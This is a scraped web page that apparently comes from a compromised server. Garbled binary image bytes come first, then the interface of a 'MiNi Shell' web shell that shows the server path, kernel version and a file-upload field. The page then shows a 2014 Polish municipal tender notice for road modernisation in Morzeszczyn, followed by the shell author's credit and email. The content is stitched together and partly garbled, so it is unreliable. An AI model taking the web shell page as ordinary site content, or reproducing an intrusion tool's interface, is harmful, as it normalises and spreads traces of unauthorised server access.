JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140212/49056-N-2014.html

<p class="kh_header"><b>Morzeszczyn: MODERNIZACJA DWÓCH DRÓG GMINNYCH W TYM :
I. DROGA TRANSPORTU ROLNEGO WE WSI NOWA CERKIEW  DZ. NR 46/3 i 140/2
 II. DROGA GMINNA NOWA CERKIEW - GĘTOMIE  DZ. NR 22 i 116/6</b><br>
<b>Numer ogłoszenia: 49056 - 2014; data zamieszczenia: 12.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Morzeszczyn , ul. 22 Lipca 4, 83-132 Morzeszczyn, woj. pomorskie, tel. 058 5362724 w. 14, faks 058 5362792.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> urzad@morzeszczyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> MODERNIZACJA DWÓCH DRÓG GMINNYCH W TYM :
I. DROGA TRANSPORTU ROLNEGO WE WSI NOWA CERKIEW  DZ. NR 46/3 i 140/2
 II. DROGA GMINNA NOWA CERKIEW - GĘTOMIE  DZ. NR 22 i 116/6.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> . Zakres rzeczowy Przedmiotu zamówienia obejmuje   :
     I. DROGA TRANSPORTU ROLNEGO WE WSI NOWA CERKIEW  DZ. NR 46/3 i 140/2
            1)  roboty pomiarowe                                                                                                     -         0,498 km 
            2)  profilowanie i zagęszczanie mechaniczne podłoża                                                  -  1.856,090 m 2 
            3)  wyrównanie istniejącej podbudowy tłuczniem sortowanym                                    -       92,805 m 3
            4)  wykonanie koryt o gł. 20 cm / mijanka i zjazd/                                                        -       85,290 m 2
            5)  wykonanie dolnej warstwy podbudowy z kruszywa łamanego / mijanka i zjazd/   -      85,290 m 2
            6)  wykonanie dolnej warstwy podbudowy / mijanka i zjazd/ za każdy dalszy 1 cm    -      85,290 m 2
            7)  skropienie nawierzchni asfaltem                                                                               -  1.856,090 m 2
            8)  wykonanie nawierzchni mineralno-bitumicznej  o grubości  4 cm                          -  1.856,090 m 2
            9)  wykonanie nawierzchni mineralno-bitumicznej  o grubości  3 cm                          -  1.856,090 m  2
         10)  wykonanie nawierzchni z tłucznia kamiennego grubości  7 cm /pobocza/   -    497,810 m 2
         11)  roboty pomiarowe powykonawcze                                                               -       0,498 km   
         II. DROGA GMINNA NOWA CERKIEW - GĘTOMIE  DZ. NR 22 i 116/6  

            1)  roboty pomiarowe                                                                                                       -         1,444 km 
            2)  roboty ziemne                                                                                                             -       75,000 m 3  
            3)  wykonanie koryt o gł. 20 cm / mijanki i zjazdy/                                                        -     267,700 m 2
            4)  wykonanie dolnej warstwy podbudowy z kruszywa łamanego / mijanka i zjazd/     -     267,700 m 2
            5)  wykonanie dolnej warstwy podbudowy  za każdy dalszy 1 cm                                 -     267,700 m 2
            6)  remonty cząstkowe , uzupełnienie ubytków w istniejącej nawierzchni                     -        24,500 m 2
            7)  skropienie nawierzchni asfaltem                                                                                -   5.567,800 m 2
            8)  wykonanie nawierzchni mineralno-bitumicznej  o gr.  4 cm                                     -      267,700 m 2
            9)  wykonanie nawierzchni mineralno-bitumicznej  o gr.  3 cm                                     -   5.567,800 m  2
          10)  wykonanie nawierzchni mineralno-bitumicznej  o gr. 3 cm za każdy dalszy  1 cm  -   5.567,800 m  2
         11)  wykonanie nawierzchni z tłucznia kamiennego grubości  7 cm /pobocza/    -   1.514,300 m 2
         12)  roboty pomiarowe powykonawcze                                                                 -         1.444 km   

       2. Szczegółowy zakres prac oraz warunki realizacji zamówienia precyzują Specyfikacja Istotnych  
           Warunków Zamówienia , Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych,  
           Przedmiar Robót oraz wzór umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.11.12.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawcy wniesienia wadium w wysokości: 10.000  PLN  
 ( słownie : dziesięć tysięcy  złotych oo/1oo )

  2.   Wadium może być wnoszone w jednej lub kilku z poniżej podanych form:
         1)    pieniądzu
        2)    w poręczeniach bankowych lub spółdzielczej kasy oszczędnościowej
        3)    gwarancjach bankowych 
        4)    w gwarancjach ubezpieczeniowych
        5)    w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2   ustawy z  
               dnia  9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 
               Nr  42, poz. 275 z 2007 roku  z późn. zm.)

  3.  Sposób przekazania wadium w pieniądzu  :
       W przypadku przekazania wadium w pieniądzu, należy je wpłacić przelewem na konto   
        Zamawiającego  numer   B.S. Skórcz o/Pelplin  51 8342 0009 2011 5339 2000 0002
        przed upływem terminu składania ofert, przy czym za termin wniesienia wadium w formie   
        przelewu pieniężnego przyjmuje się termin uznania na rachunku Zamawiającego.

   4.  Zatrzymanie wadium
 Zamawiający zatrzymuje wadium  jeżeli :
1)	Wykonawca w odpowiedzi na wezwanie , o którym mowa art. 26 ust. 3, nie złożył dokumentów lub oświadczeń ,  o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie
2)	Wykonawca, którego oferta została wybrana 
- odmówił podpisania umowy
- nie wniósł wymaganego zabezpieczenia należytego wykonania umowy
- zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy

   5. Wadium w formie innej niż w pieniądzu należy składać jako kopię potwierdzoną za zgodność z  
       oryginałem lub oryginalny dokument wraz z ofertą ( wskazane jest aby oryginał umieszczany był w  
       osobnej kopercie) . 
       Dokument wniesienia wadium powinien wskazywać przypadki, w których Zamawiający ma prawo  
       zatrzymać wadium zgodnie z art. 46 ust. 4a i ust. 5 ustawy Prawo zamówień publicznych.
       Dokument w formie poręczenia winien zawierać stwierdzenie, że na pierwsze pisemne żądanie  
       zamawiającego wzywające do zapłaty wadium, zgodnie z warunkami przetargu, następuje jego   
       bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń.
       
Zgodnie z wymogami ustawy Pzp oraz instytucji wydających poręczenia , oryginalny dokument zostanie zwrócony Wykonawcy. W związku z powyższym  nie należy go trwale wpinać do oferty. Do oferty należy wpiąć kopię , która pozostanie u Zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.  Uzna warunek za  
              spełniony, na podstawie oświadczenia Wykonawcy zgodnie z art. 22 ust. 1 ustawy Pzp.
              Warunek zostanie uznany za spełniony jeżeli Wykonawca złoży stosowne oświadczenie
              Zał. Nr  2 SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca wykaże, że posiada wiedzę i  
            doświadczenie, a w szczególności , że  w okresie ostatnich pięciu lat przed upływem terminu  
            składania ofert  albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli  okres  
            prowadzenia działalności jest krótszy - w tym okresie, wykonał  co najmniej  2 roboty  
            budowlane w zakresie budowy lub przebudowy dróg  o wartości nie mniejszej niż 500.000,00 zł   
            brutto każda. Wykazane przez Wykonawcę roboty muszą być wykonane lub są wykonywane z 
            należytą starannością.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona           
             oceny spełnienia w/w warunku na podstawie oświadczenia Wykonawcy o spełnieniu warunków   
             udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. Warunek zostanie uznany    
             jeżeli wykonawca złoży stosowane oświadczenie  Zał. Nr 2 SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca  wykaże, że dysponuje  
               odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub  
               przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału 
               technicznego i osób zdolnych do wykonania zamówienia  , w tym : 
               - co najmniej 1 osobą  z minimum 2 letnim doświadczeniem w specjalności , posiadającą        
                  uprawnienia budowlane do samodzielnych funkcji technicznych w budownictwie w zakresie 
                  dróg - uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności 
                  drogowej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na 
                  podstawie wcześniej obowiązujących przepisów, zakresu wykonywanych obowiązków oraz 
                  podstawie dysponowania tymi osobami  Zał. Nr  5 SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo sposobu spełnienia tego warunku .
        Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie  prowadzonej działalności w wysokości, co najmniej  500.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>2.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
3.	Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.
4.	Wykonawca nie później niż na dzień składania ofert zobowiązany jest wykazać spełnienie warunków udziału w postępowaniu, o których mowa w pkt. VI   oraz brak podstaw do wykluczenia z postępowania, w okolicznościach o których mowa w art. 24 ust. 1 ustawy.
5.	W PRZYPADKU WYKONAWCÓW WSPÓLNIE UBIEGAJĄCYCH SIĘ O UDZIELENIE ZAMÓWIENIA PUBLICZNEGO warunek określony w pkt. VI pkt.1 lit. a i b) musi spełniać każdy z tych Wykonawców, a warunki określone w pkt. VI pkt.1 lit c-g ) muszą spełniać łącznie, natomiast każdy z Wykonawców wspólnie ubiegających się o zamówienie zobowiązany jest wykazać brak podstaw do wykluczenia go z postępowania na podstawie art. 24 ust. 1 ustawy Pzp (tj. przedstawić dokumenty wskazane w pkt. VII ppkt. 7.4.). 
6.	Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą (spełnia - nie spełnia), 
w oparciu o informacje zawarte w dokumentach i oświadczeniach załączonych do oferty.  
Z treści załączonych dokumentów lub oświadczeń musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie istototne postanowienia umowy określa niniejsza SIWZ.
3.  Wykonawca składając ofertę oświadcza na formularzu oferty, że akceptuje istotne postanowienia, które   
     zostaną   wprowadzone do treści zawartej umowy w sprawie zamówienia publicznego. 
4.  Zgodnie z art. 144 ustawy - Prawo zamówień publicznych Zamawiający przewiduje możliwość dokonania     
     istotnych zmian zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru   
     Wykonawcy. Zamawiający  przewiduje możliwość zmiany postanowień zawartej umowy  w stosunku do treści    
      oferty w określonych warunkach możliwości dokonania zmian :
  -  zmiana regulacji prawnych w stosunku do powszechnie obowiązujących przepisów prawa (np. urzędowa  
     zmiana stawki  podatku VAT)
  -  konieczności zmiany terminu realizacji
  -  działaniem siły wyższej w rozumieniu przepisów k.c. w związku z powstaniem okoliczności wynikających z    
     przyczyn niezależnych od Zamawiającego  tj. technicznych , gospodarczych i finansowych
  -  z przyczyn których wcześniej nie można było przewidzieć a wykonanie  umowy  
     nie leży w  interesie publicznym umowy,  Zamawiający może odstąpić od umowy w terminie 30 dni od 
     powzięcia wiadomości o tych okolicznościach tj.
         -  jeżeli zostanie ogłoszona upadłość lub rozwiązanie firmy Wykonawcy,
         -  jeżeli zostanie wydany nakaz zajęcia majątku Wykonawcy, 
         -  jeżeli Wykonawca przerwał roboty bez podania przyczyny i uzasadnienia           
       5. Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Pzp:
a)	zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana 
nr rachunku bankowego),
b)	zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między stronami.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> urzad@morzeszczyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD GMINY MORZESZCZYN
Ul. 22 Lipca 4  83-132 Morzeszczyn
Pok. nr 13, I PIĘTRO.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.03.2014 godzina 12:00, miejsce: URZĄD GMINY MORZESZCZYN
Ul. 22 Lipca 4  83-132 Morzeszczyn
Pok. nr 10, I PIĘTRO (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com